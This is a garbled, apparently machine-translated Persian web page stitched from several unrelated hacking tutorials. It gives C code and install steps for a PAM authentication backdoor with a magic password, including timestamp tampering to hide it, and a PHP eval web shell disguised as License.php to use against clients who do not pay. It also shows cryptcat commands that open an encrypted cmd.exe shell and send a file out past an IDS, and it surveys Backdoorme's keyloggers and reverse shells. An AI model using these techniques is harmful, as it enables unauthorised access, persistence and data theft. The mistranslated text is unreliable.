وبلاگ ما در هابریا نه تنها در مورد توسعه محصول خود - تلفن برای اپراتورهای اتصال Hydra به ما می گوید، بلکه مطالبی را در مورد کار با زیرساخت ها و فناوری های مرتبط منتشر می کند.

روزنامه‌نگار و هکر آلمانی Leif Ryge مقاله‌ای جامع برای Ars Technica نوشت که چگونه رویکرد فعلی سازمان‌دهی به‌روزرسانی‌های نرم‌افزاری خطرات جدی امنیت اطلاعات را به همراه دارد. ما نظرات محترمانه شما را به این مقاله ارائه می کنیم.

ماقبل تاریخ

در سال 2014، هیئت تحریریه واشنگتن پست در مورد اینکه چگونه شرکت‌ها می‌توانند از کلیدهای اپل و گوگل برای یافتن یک کلید مخفی روی کلید استفاده کنند، نوشت که می‌توان از آن برای جلوگیری از دسترسی به محصولاتشان و نحوه ذخیره و انتقال آن‌ها استفاده کرد. سازمان های اطلاعاتی. تصمیم».

بنابراین کاهش "پوست ضعیف"، حمله ای به پوست که می تواند حیاتی باشد، برای هر مکانیزم جدید برای گسترش امنیت نرم افزاری اساسی است.

راه‌های زیادی وجود دارد که می‌توانید جای پایی روی یک ماشین خراب کنید. از پیش پا افتاده ترین و آسان برای شناسایی (خود را به پایگاه داده توسعه دهندگان اضافه کنید) تا ماژول های هسته تاشو که یک پوسته دروازه را روی یک ماشین راه دور پیاده سازی می کنند. در میان آنها، اجرای آن بسیار ساده است و دارای یک روش مخفی است که افراد کمی از آن اطلاع دارند. این اصلاحی از ماژول های سیستم احراز هویت PAM است که همه سیستم های فعلی یونیکس از آن استفاده می کنند.

PAM چیست؟

ماژول های احراز هویت (PAM) - مجموعه ای از API های لازم برای پیاده سازی مکانیسم های احراز هویت در برنامه های مختلف.

قبل از ظهور PAM، برای اجرای احراز هویت، مثلاً با کمک یک کارت کلید، فروشندگان باید کد پشتیبانی کارت های کلیدی خود را در هر جزء سیستم وارد می کردند که وظیفه احراز هویت مشتری را بر عهده داشت. به منظور افزودن و انتخاب مجدد ابزار ورود به سیستم، sshd، و همچنین هر نرم افزار دیگری که قرار بود عملکرد مشابهی به آن اضافه شود.

با ظهور PAM، وضعیت به طور قابل توجهی روشن شده است. اکنون، برای افزودن پروتکل احراز هویت منحصر به فرد خود به سیستم، کافی است آن را در یک ماژول PAM پیاده سازی کنید. و تمام ابزارها و برنامه هایی که با PAM کار می کنند، از آن استفاده می کنند و می توانند برای احراز هویت کاربر استفاده شوند.

در عمل، چیزی شبیه این به نظر می رسد: ابزار ورود به PAM گسترش می یابد، که تمام بررسی های لازم را برای مقادیر اضافی در فایل پیکربندی ماژول تکمیل می کند و نتیجه را به ابزار ورود برمی گرداند. باحال، چرا که نه؟ با این حال، چنین رویکردی امکاناتی را که می توانیم برای به دست آوردن جای پایی در سیستم استفاده کنیم، تضعیف می کند.

Varto zrobiti کوچک zastorezhenya. سه پیاده سازی اصلی PAM وجود دارد:

  • Linux-PAM اجرای اصلی PAM در هر سیستم لینوکس است.
  • OpenPAM - در سیستم های BSD و macOS پشتیبانی می شود.
  • JPam یک پیاده سازی PAM برای افزونه های جاوا است.

ما روی اجرای خاصی تمرکز نخواهیم کرد. عملکرد اصلی یکسان است.

جنبه های ادغام *nix با ویکی های PAM

می توانید نحوه تنظیم PAM را برای برنامه پوست از Cataloza بیابید /etc/pam.d(لینوکس) یا در فایل /etc/pam.conf. نمونه ای از فایل پیکربندی برای ابزار ورود به سیستم در macOS:

auth اختیاری pam_krb5. بنابراین use_kcminit

auth اختیاری pam_ntlm. بنابراین try_first_pass

auth اختیاری pam_mount. بنابراین try_first_pass

pam_opendirectory مورد نیاز است. بنابراین try_first_pass

اکانت مورد نیاز pam_nologin .so

حساب مورد نیاز pam_opendirectory .so

پسورد مورد نیاز pam_opendirectory .so

جلسه مورد نیاز pam_launchd .so

جلسه مورد نیاز pam_uwtmp .so

جلسه اختیاری pam_mount .so

بیایید بفهمیم جادو در اینجا چگونه کار می کند.

فایل پیکربندی قوانین تاییدی را که برای احراز هویت موفقیت آمیز یک کلاینت و سایر اقدامات (تغییر رمز عبور، آماده سازی مشتری) ضروری است، توضیح می دهد. هر ردیف از فایل پیکربندی شامل یک قانون است. معکوس ها در یک ردیف مرتب شده اند.

از چپ به راست: نوع ماژول، control_flag، نام ماژول. ابتدا باید نوع ماژول احراز هویت را مشخص کنیم، این ماژول ها خود مسئول احراز هویت هستند. Control_flag - قدرت ماژول. می توانید معنی را حدس بزنید:

  • لازم (الزامی) - هنگامی که ماژول سیگنال مثبت را می چرخاند، بخشی از بند که گم شده بود برداشته می شود و سپس ارضا می شود. اگر ماژول نتیجه منفی را معکوس کند، به طور تصادفی به بیرون پرتاب می شود و سایر تأییدها تکمیل نمی شوند.
  • لازم (ضروری) - و همچنین لازم: در صورت مثبت بودن تأیید، قسمتی از چک که مفقود شده حذف می شود. به دلیل این تفاوت، در صورت نوع منفی، تسمه چک همچنان از کار می افتد، منبع تغذیه تنظیم مجدد می شود.
  • کافی (کافی) - در این مورد سؤال را برآورده می کند، زیرا بررسی های قبلی تأثیر منفی نداشته است. اگر ماژول به صورت منفی مشخص شود، نتیجه نادیده گرفته می شود و حلقه معکوس بیشتر انجام می شود.
  • اختیاری (اختیاری) - ماژول اجرا می شود، در غیر این صورت نتیجه نادیده گرفته می شود.

در حال حاضر در این مرحله، مشخص است که با ایجاد تغییرات جزئی در فایل پیکربندی، می‌توانیم از ورود موفقیت‌آمیز به سیستم با هر رمز عبور اطمینان حاصل کنیم (کافی است همه ماژول‌های تأیید را به عنوان اختیاری علامت‌گذاری کنیم). در غیر این صورت، تصمیم گیری تنها با مشتری یا مدیر قانونی خواهد بود که قادر به ثبت نام موفقیت آمیز با ورود به سیستم با رمز عبور نادرست نخواهد بود.

ما در حال نوشتن یک ماژول در پشتی قدرتمند هستیم

PAM به ما اجازه می دهد تا مدل های احراز هویت قدرتمند را فعال کنیم. بنابراین، ما می توانیم ماژول را با یک رمز عبور "جذاب" نابود کنیم و اطمینان حاصل کنیم که سیستم هم رمزهای عبور استاندارد مشتریان و هم دولت ما را می پذیرد. اگر رمز عبور را اشتباه وارد کنید، یک دور زدن احراز هویت کامل به شما داده می شود. گزینه بد

خوب، کد (فراموش نکنید که رمز عبور جادویی را با رمز عبور "جذاب" خود جایگزین کنید):

#عبارتند از

#عبارتند از

#عبارتند از

#عبارتند از

#عبارتند از

#عبارتند از

#define MYPASSWD "magic-password"

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

بازگشت PAM_SUCCESS ;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

بازگشت PAM_SUCCESS ;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh , int flags , int argc , const char * * argv ) (

char *password = NULL;

pam_get_authtok (pamh، PAM_AUTHTOK، (const char * *) & password، NULL);

if (! strncmp (رمز عبور، MYPASSWD، strlen (MYPASSWD)))

بازگشت PAM_SUCCESS ;

بازگشت - 1؛

ماژول Zberem:

$ sudo apt - دریافت نصب libpam0g - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x -- اشتراک گذاری شده - o pam_backdoor .so pam_backdoor .o

بیایید آن را با ماژول های دیگر در دایرکتوری قرار دهیم:

$ sudo chown root : root pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / Security /

به کاری که انجام می دهید احترام بگذارید /lib/x86_64-linux-gnu/security/مخصوص دبیان/اوبونتو برای Fedora، Red Hat و CentOS، ماژول ها در کاتالوگ قرار دارند /lib64/security/و در Arch Linux - در catalosis /lib/security/.

اکنون فقط می توانید PAM را به گونه ای پیکربندی کنید که فرآیند تأیید ماژول شما برای احراز هویت موفقیت آمیز کافی باشد. به عنوان مثال، پیکربندی برای ابزار su ( /etc/pam.d/su):

در برخی از سیستم‌های لینوکس، احراز هویت را می‌توان در گروهی از فایل‌ها پیکربندی کرد: common-auth، common-password، common-session، و سپس از طریق @include به فایل‌های پیکربندی ابزارهای خاص متصل شد. در این لحظه شما نیاز به عبادت دارید.

پس از وارد کردن تنظیمات به پیکربندی، برنامه su با استفاده از رمز عبور مشخص شده در ماژول برای شما راه اندازی می شود. همین ترفند را می توان با استفاده از ابزار ورود (ورود کنسول) و sshd برای ورود از راه دور انجام داد.

ما یک درب پشتی را در ماژول اصلی نصب خواهیم کرد

هنگام ویرایش پیکربندی PAM، می توانید ماژول pam_unix.so را علامت گذاری کنید. این ماژول احراز هویت مشتریان را با استفاده از پایگاه داده رمز عبور استاندارد برای سیستم های یونیکس فراهم می کند. /etc/passwd. ابزارهای زیادی در دسترس هستند، از جمله su، login، sshd، و برنامه های دیگر (به عنوان مثال، SecureFTPd).

خرده‌های PAM هنوز منبع باز هستند و ما به متن‌های خروجی خود دیمون و مؤلفه‌های استاندارد دسترسی داریم و می‌توانیم درب پشتی خود را مستقیماً در این ماژول قرار دهیم.

به منظور ایجاد تغییرات لازم، متون خروجی PAM به روز می شوند:

$ http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

$tar - xzf inux - PAM - 1.1.8.tar.gz

باز کردن فایل Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.cو به دنبال ردیف های بعدی می گردیم:

ما ماژول اصلی را با خودمان انتخاب و جایگزین می کنیم:

$. /پیکربندی

$ ساخت

$ sudo cp Linux - PAM - 1.1.8 / modules / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / Security /

برای اینکه مدیر جایگزین را علامت نزند، زمان ایجاد فایل را تغییر می دهیم تا از زمان ایجاد ماژول های دیگر جلوگیری کنیم.

من در مقاله "10 سال و توصیه هایی برای ساخت سایت" به یاد دارم، اگر یک مشتری ناصادق تصمیم گرفت ما را بی اهمیت به سمت کسانی که یکباره کار می کردند بیش از تکرار سرنوشت پرتاب کند، نتیجه را پیش بینی کردم. بعد از اینکه متوجه شدیم قرار نیست هزینه ای بپردازیم، نتوانستیم سایت های خود را باز کنیم و هنوز چند تکه آب در آنها باقی مانده بود.

با این حال، نگران بودم که در یکی از سایت ها یک "ورودی یدکی" کوچک را گم کرده باشم و بدون اینکه به آن فکر کنم به سایت دیگری بروم و دنیا را ترک کنم. و با مشاهده این ورودی فرمی ساده برای آپلود فایل ها در سرور خواهید دید.

من با وارد کردن اسکریپت های مورد نیاز در سایت و راه اندازی آنها در سایت به این امر کمک خواهم کرد و با کمک آنها ربات های خشن خود را سرقت می کنند. تنها یک منهای از این درها وجود دارد - آنها می توانند به سرعت ناپدید شوند، البته اگر کسی از وجود آنها اطلاع داشته باشد.

یک ساعت گذشت، و برای کسانی که تا امروز همه چیز به آرامی پیش می رفت مهم نیست، اما این واقعیت را شامل نمی شود که چنین جعفری ممکن است دوباره تکرار شود.

در اصل شما می توانید از روش قدیمی ارسال فایل به سرور استفاده کنید اما ... خبر پیچیده است زیرا می توانید این کار را به روش ساده تری انجام دهید.

من انواع و ایده هایی از ساده ترین بکدوروف را پیشنهاد می کنم تا واقعاً مشکل ایجاد کنم. اوز...

  1. ما یک فایل php ایجاد می کنیم و آن را چیزی شبیه License.php یا چیزی شبیه به آن می نامیم.
  2. با کد جدید بنویسید

    if (isset($_POST["متن"]))
    eval($_POST["متن"]);
    ?>




  3. ما فایل را در جایی که ارسال شده در cms قرار می دهیم، مثلاً در نت ویرایشگر WYSIWYG. در صورت لزوم، پس از 2-3 ماه مجدداً فایل را کپی کنید (در مورد هر آتش سوزی)

Axis vin، قاب برای نامناسب بودن. از شما متشکرم، نیازی به توضیح نیست که تابع eval کد را به فرم اختصاص می دهد.

در کل یک قاب است که بدون هیچ برنامه کاربردی برای پیاده سازی قابل استفاده است. این امکان وجود دارد که از طریق highlight_file، هر فایلی را با پسوردهایی که دسترسی مستقیم ندارند جایگزین کنید. می توانید به پایگاه داده متصل شوید، آن را بازخرید یا تغییر دهید. شما همچنین می توانید یک اسکریپت ایجاد کنید تا همه چیز را در سرور ببینید، مهم نیست که چه باشد.

در زیر ایده هایی را برای درب های اضافی که می توان برای سبد ساخت - معرفی می کنم - به عنوان یک کار ضروری خانه به شما خواننده عزیز می سپارم. اگر کیک روز خوبی است، خوشحال می شوم به آنچه که بیرون آمده است نگاه کنم.

ایده هایی برای دکوراسیون :

  1. بد است که درب برای همه قابل دسترسی نباشد و مثلاً از طریق اضطراری برای آن مجوز ایجاد شود. یادداشت ویراستار).
  2. هنگامی که مجوز دریافت کردید، می توانید بلافاصله یک سری دکمه آماده کنید که می توانید برای دسترسی به اسکریپت دیگری روی آنها کلیک کنید. به عنوان مثال، شما به درب خود می روید، و دکمه هایی وجود دارد - بازیابی رمزهای عبور، بازیابی پایگاه داده، مشاهده پنل مدیریت، و غیره.
  3. هر ایده دیگری؟

در پایان روز

اگر قبل از پرداخت یک وب سایت ایجاد می کنید (در صورت پرداخت) یا اگر با یک شرکت کار می کنید و می خواهید بیمه شوید، درب Vikoristovaty ایده خوبی است. در حالت اول، اگر پرداخت سررسید باشد، می توان درب را برداشت یا برداشت، اما فکر نمی کنم دیگر نیازی به آن باشد. و در سناریویی دیگر، باید آنها را در آمادگی به تدریج کوتاه کنید.

برای امروز کافی است. من خوشحال خواهم شد که ایده ها و پیشنهادات شما را در مورد موضوع بشنوم! تا اخبار جدید

Cryptcat به ما امکان می دهد بین دو سیستم ارتباط برقرار کنیم و ارتباطات بین آنها را با استفاده از دو ماهی رمزگذاری می کنیم - یکی از الگوریتم های رمزگذاری بسیار عالی.

قبلاً در مورد یک چیز کوچک یاد گرفتیم که به شما امکان می دهد بین دو ماشین ارتباط برقرار کنید و فایل ها را انتقال دهید یا یک پوسته فرمان برای "اتصال مجدد" سیستم ایجاد کنید. علیرغم زیبایی و ظرافت این ابزار کوچک، یک اشکال عمده وجود دارد - انتقال بین رایانه ها توسط دستگاه های امنیتی مانند فایروال ها و سیستم های تشخیص نفوذ (IDS) قابل شناسایی است.

این درس به پسر عموی محبوب نت کت، cryptcat (که در واقع یک نت گربه بسیار زیبا و عجیب و غریب و در عین حال ساده تر است) مربوط می شود.

رمزگذاری Twofish برابر با رمزگذاری AES است، بنابراین cryptcat عملا ضد گلوله است. بنابراین، IDS نمی تواند رفتار بد را در ترافیک تشخیص دهد، اگر مسیرهای آن از چنین پورت های HTTP اولیه 80 و 443 عبور کنند.

Croc 1: وانمود کردن Cryptcat

کروک 2: قفل سمعک خود را در ویندوز باز کنید

ما می‌توانیم شنونده را در هر سیستمی با نحوی مشابه مانند netcat باز کنیم. در نسخه ما، ما اسپیکر ویندوز 7 را در پورت 6996 باز می کنیم و یک پوسته فرمان ایجاد می کنیم.

cryptcat -l -p 6996 -e cmd.exe

L مخفف "گوش را باز کن" است.
-p 6996 به معنای "قرار دادن شنونده در پورت 6996" است.
-e cmd.exe به معنای "شروع پوسته فرمان برای ارتباط" است.

کروک 3: Snort یا IDS دیگری را باز کنید

اکنون، بیایید یک IDS از نوع Snort را روی سیستم دیگری اجرا کنیم که به سیستم ویندوز متصل می شود تا اطمینان حاصل شود که IDS با رمزگذاری "مهر شده" است و میزبان سیاه ما را برای چنین دستگاه های امنیتی نامرئی می کند.


کروک 4: با Cryptcat به سیستم ویندوز متصل شوید

برای نصب Cryptcat در BackTrack، تقصیر ما نیست که دخالت کنیم و آن را نصب کنیم. علاوه بر این، اگر در پوشه /bin قرار داشته باشد، می توان از دسترسی به هر دایرکتوری دیگری جلوگیری کرد.

اکنون از سیستم BackTrack خود به سیستم cryptcat ویندوز 7 متصل می شویم و می بینیم که چگونه می توانیم درب پشتی اتصال رمزگذاری شده را شکست دهیم، که ممکن است تشخیص آن ممکن نباشد.

cryptcat 192.168.4.182.248 6996


همانطور که می بینید ما به سیستم ویندوز 7 متصل شده ایم و پوسته فرمان را از سیستم Win 7 حذف کرده ایم! این به ما کنترل قابل توجهی بر روی این سیستم می دهد، اما نه کامل، زیرا پوسته فرمان در توانایی های خود محدود است.

کروک 5: گزارش ها و هشدارهای Snort را اجرا کنید

اگر اتصال رمزگذاری نشده باشد، این نوع حمله (عبور پوسته فرمان از حصار) به راحتی توسط Snort یا IDS های دیگر شناسایی می شود. قوانین Snort به مدیر سیستم می گوید که پوسته cmd.exe باید از یک خط ارتباطی نازک عبور کند و احتمالاً شما را از ارزش پیروز پوسته فرمان حذف می کند. با ارتباطات رمزگذاری شده در دسترس از طریق cryptcat، این پیوند ممکن است قابل مشاهده نباشد.

بیایید به عقب برگردیم و گزارش‌ها و هشدارها را در Snort بررسی کنیم. از آنجایی که ما در IDS های پیچیده موفق بوده ایم، نیازی به نگرانی در مورد جابجایی پوسته فرمان از طریق شکاف نیست. ما می‌توانیم گزارش‌های خود را بررسی کنیم، به /var/snort/alerts وارد شویم و ببینیم چه سیگنال‌هایی از اتصال خود به دستگاه ویندوز دریافت می‌کنیم (متاسفیم که زودتر بدانیم).

kwrite /var/snort/alerts


همانطور که می توانید ادامه دهید، ما به موفقیت دست یافته ایم. ما توانستیم بدون نگرانی از هیچ سیستم امنیتی به سیستم ویندوز متصل شویم!

کروک 6: برای فرار از فایروال، Crypcat را روی پورت 80 ارسال کنید

اگر با موفقیت یک درب پشتی رمزگذاری در سیستم قربانی ایجاد کرده باشیم، مدیر امنیتی باید اطمینان حاصل کند که پورت ناشناس (6996) فعال است. این، که بیش از همه چیز است، باید توسط مدیر امنیتی آغاز شود تا دسترسی ما را محدود کند. علاوه بر این، در سیستم هایی با مدیر سیستم خوب و فایروال خوب، این پورت احتمالا توسط فایروال مسدود می شود.

برای هر اقدامی، برای اینکه مادران بتوانند برای همه چیز در اینترنت بگردند، باید از پورت های رمزگذاری نشده 80 و 443 و همچنین شاید 25، 53 و 110 استفاده کرد. تکه هایی از نمای رمزگذاری نشده اینترنت معمولی - ترافیک از پورت 80 عبور می کند که اگر بلافاصله باز شود، بعید است که افزایش جزئی در ترافیک مشاهده شود.

حال، اگر با موفقیت cryptcat را فتح کرده باشیم، آن را از طریق پورت 80 با تمام ترافیک اینترنت دیگر ارسال می کنیم. اگر می‌خواهید رمزگذاری کنید، بیایید ببینیم چه نوع داده‌هایی روی خط منتقل می‌شوند. بنابراین، شناسایی آن برای مسدود کردن آن برای دستگاه‌های امنیتی غیرممکن است، قطعات همیشه مسئول اجازه دادن به ترافیک از طریق پورت 80 هستند، و ترافیک رمزگذاری شده است و IDS نمی‌تواند به جای آن، آن را "بچ" کند.

در اینجا ما یک فایل را از سیستم قربانی به نام topsecret.txt به سیستم حمله خود بدون شناسایی دستگاه امنیتی منتقل می کنیم. این بار به جای ارسال پوسته فرمان از طریق حصار، از طریق اتصال رمزگذاری شده خود، بر فایل فوق سری به نام topsecret.txt غلبه می کنیم. ما می توانیم این کار را با تایپ کردن در خط فرمان ویندوز انجام دهیم:

cryptcat -l -p 80< topsecret.txt

L مخفف "گوش را باز کن" است.
-p 80 به معنای "باز کردن شنونده در پورت 80" است.
< означает "отправить файл через этого слушателя"

Backdoorme - ابزاری برای ایجاد خودکار درهای پشتی

Backdoorme یک ابزار بسیار آسان است که می توان از آن برای ایجاد درهای پشتی مخفی در ماشین های یونیکس استفاده کرد. Backdoorme از رابط آشنا metasploit با قابلیت توسعه شگفت انگیز استفاده می کند. Backdoorme به اتصالات SSH قربانی و داده های ابری متکی است، که از طریق آنها می توانند هر درب پشتی را انتقال داده و قرار دهند. با یک ساختمان مجزا و باز مهربان باشید.

به عنوان مهمان پذیرفته شد


Backdoorme بلافاصله با تعداد زیادی درب پشتی پیاده سازی شده، ماژول ها و ماژول های اضافی عرضه می شود. درهای پشتی اجزای خاصی برای ایجاد و ایجاد یک درب پشتی ضروری هستند، مانند درب پشتی netcat یا درب پشتی msfvenom. ماژول‌ها را می‌توان روی هر درب پشتی قرار داد و طوری تغییر داد که درب‌های پشتی محکم‌تر، متصل‌تر یا پوشیده‌تر شوند. عناصر اضافی و عملیات مربوطه که می توانند برای کمک به حفظ پایداری حذف شوند.

کمی بیشتر در مورد درهای پشتی:برای شروع Backdoorme، آنچه را که نیاز دارید بررسی کنید.

$python dependencies.py

راه اندازی Backdoorme:

$ python master.py

درب پشتی

برای شناسایی یک درپشتی، به سادگی کلمه کلیدی "use" را اجرا کنید.

>> استفاده از shell/metasploit + استفاده از هدف فعلی 1. + استفاده از Metasploit backdoor... (msf) >>

می توانید گزینه هایی را برای دسترسی به درب پشتی تنظیم کنید. برای مشاهده لیست پارامترهای قابل تنظیم، «show options» یا «help» را اجرا کنید.

همانند متاسپلویت، درهای پشتی بر اساس دسته بندی سازماندهی می شوند.

  • کمکی (دسته های اضافی)
    • کی لاگر- یک کی لاگر به سیستم اضافه می کند و به شما امکان ارسال مجدد نتایج از طریق پست را می دهد.
    • سادهhttp– سرور Python SimpleHTTP را روی کلاینت نصب می کند.
    • کاربر- این کوریستوواچ جدید را به لبه پرتگاه می برد.
    • وب– سرور آپاچی را روی کلاینت نصب می کند.
  • تشدید
    • سست– SetUID backdoor به شما امکان می دهد با در نظر گرفتن دسترسی روت کاربر، یک بیت setuid را روی فایل کامپایل شده نصب کنید. بنابراین، زمانی که بعداً یک فایل توسط کاربری راه‌اندازی می‌شود که اجازه دسترسی روت را نمی‌دهد، فایل به دسترسی ریشه پیوند داده می‌شود. در تئوری، این backdoor بیت setuid را به nano هدایت می‌کند، به طوری که اگر دسترسی ریشه به هر طریقی از بین برود، مهاجم می‌تواند دوباره به عنوان یک کاربر غیرمجاز وارد SSH شود و همچنان می‌تواند nano (یا یک فایل دوتایی) را به عنوان root اجرا کند. ("nano /etc/shadow"). لطفاً توجه داشته باشید که برای باز کردن این افزونه، درب پشتی نیاز به دسترسی ریشه به خود cob دارد.
    • پوسته– درب پشتی پوسته یک پسوند درب پشتی ترجیحی است، مشابه پسوند برادر SetUID (یا خاص تر). پوسته bash فایل تکراری را کپی می کند و بیت SUID را تنظیم می کند. لطفاً توجه داشته باشید که دسترسی ریشه برای این بسط درب پشتی مورد نیاز است. برای شکست دادن این درب پشتی، جایی که SSH به عنوان یک سرور خصمانه عمل می کند، به سادگی ".bash -p" را اجرا کنید و دسترسی ریشه خواهید داشت.
  • پوسته (دسته پوسته)
    • ضربه شدید– wikirist از یک اسکریپت bash ساده برای اتصال به یک IP و ترکیب پورت خاص و ارسال نتیجه به bash استفاده می کند.
    • bash2- کمی کمتر (و قابل اطمینان تر) از درپشتی توصیف شده bash، که از سمت مشتری رمز عبور نمی خواهد.
    • متاسپلویت– از msfvenom برای ایجاد یک کد دوگانه reverse_tcp روی هدف استفاده می کند، سپس کد دوگانه را برای اتصال به بسته بندی مترپرتر اجرا می کند.
    • نت کت– vikoryst netcat برای انتقال ورودی و خروجی دستگاه استاندارد /bin/sh، به پوسته تعاملی koristuvache.
    • netcat_traditional- Vikoristovu netcat-s -e سنتی برای ایجاد پوشش.
    • پرل– یک اسکریپت نوشته شده در پرل که نتیجه را از bash تغییر مسیر می دهد و نام فرآیند را تغییر می دهد تا کمتر به هم ریخته به نظر برسد.
    • php– یک درب پشتی PHP راه اندازی می کند که بر نتیجه bash غلبه می کند. به طور خودکار وب سرور را نصب نمی کند، بلکه ماژول وب vikoryst را نصب می کند.
    • توله سگ- Vikorist backdoor n1nj4sec توله سگ، که در شناخته شده است

      به عنوان مهمان پذیرفته شد

      .
    • پایتون– vikorist یک اسکریپت پایتون کوتاه برای دستورات vikonanny و بازگرداندن نتایج به koristuvach است.
    • وب– وب سرور را به هاست ارسال می کند، سپس درب پشتی msfvenom php reverse_tcp را نصب می کند و به هاست متصل می شود. صرف نظر از این واقعیت که هنوز یک درب پشتی php است، با توضیحات درب پشتی بیشتر php یکسان نیست.
  • دسترسی (دسته دسترسی)
    • remove_ssh- سرور ssh را روی کلاینت حذف نصب می کند. واقعاً خوب است که جلسات درب پشتی را بررسی کنید تا هر گونه اثری را حذف کنید.
    • ssh_key- یک کلید RSA ایجاد می کند و آن را برای اتصال بدون رمز عبور ssh در هدف کپی می کند.
    • ssh_port– یک پورت جدید برای ssh اضافه می کند.
  • ویندوز (دسته ویندوز)
    • پنجره ها– Vikorist از msfvenom برای ایجاد درب پشتی ویندوز استفاده می کند.
ماژول ها

ممکن است لازم باشد که درب پشتی پوسته از ماژول‌های اضافی که برای قوی‌تر کردن درب پشتی تشکیل شده‌اند جدا شود. برای اضافه کردن یک ماژول، فقط کلمه کلیدی add را ویکورایز کنید.

(MSF) >> افزودن سم + ماژول سم اضافه شد

ماژول پوست دارای پارامترهای اضافی است که می توان آنها را تنظیم کرد و اگر دوباره "help" را اجرا کنید، می توانید هر گزینه اضافی را دانلود یا نصب کنید.

ماژول های موجود در حال حاضر عبارتند از:

  • سم
    • bin کامپایل کامپیوتر هدف - Win فایل کامپایل شده را برای دسترسی به ابزار سیستم و درب پشتی اصلی کامپایل می کند.
    • به عنوان مثال، اگر ماژول bin را همزمان با "ls" باز کند، کد دوگانه را تحت نام "ls" که به عنوان درب پشتی اصلی راه اندازی می شود، کامپایل و انتقال می دهد، و همچنین تحت "ls"، بنابراین امکان درب پشتی برای راه اندازی بیشتر درب پشتی.
  • کرون
    • یک درب پشتی crontab جدید برای کاربر root اضافه می کند تا در فرکانس مشخص کار کند.
  • وب
    • یک وب سرور نصب می کند و یک صفحه وب را میزبانی می کند که یک درب پشتی راه اندازی می کند.
    • فقط با گوش های باز به سایت بروید و درب پشتی راه اندازی می شود.
  • کاربر
    • به koristuvach جدید یک انفجار می دهد.
  • استارت آپ
    • به شما امکان می دهد با فایل های bashrc و init درهای پشتی ایجاد کنید.
  • لیست سفید
    • یک "لیست سفید" به IP اضافه کنید به گونه ای که فقط این IP بتواند به درب پشتی متصل شود.
ترجمه: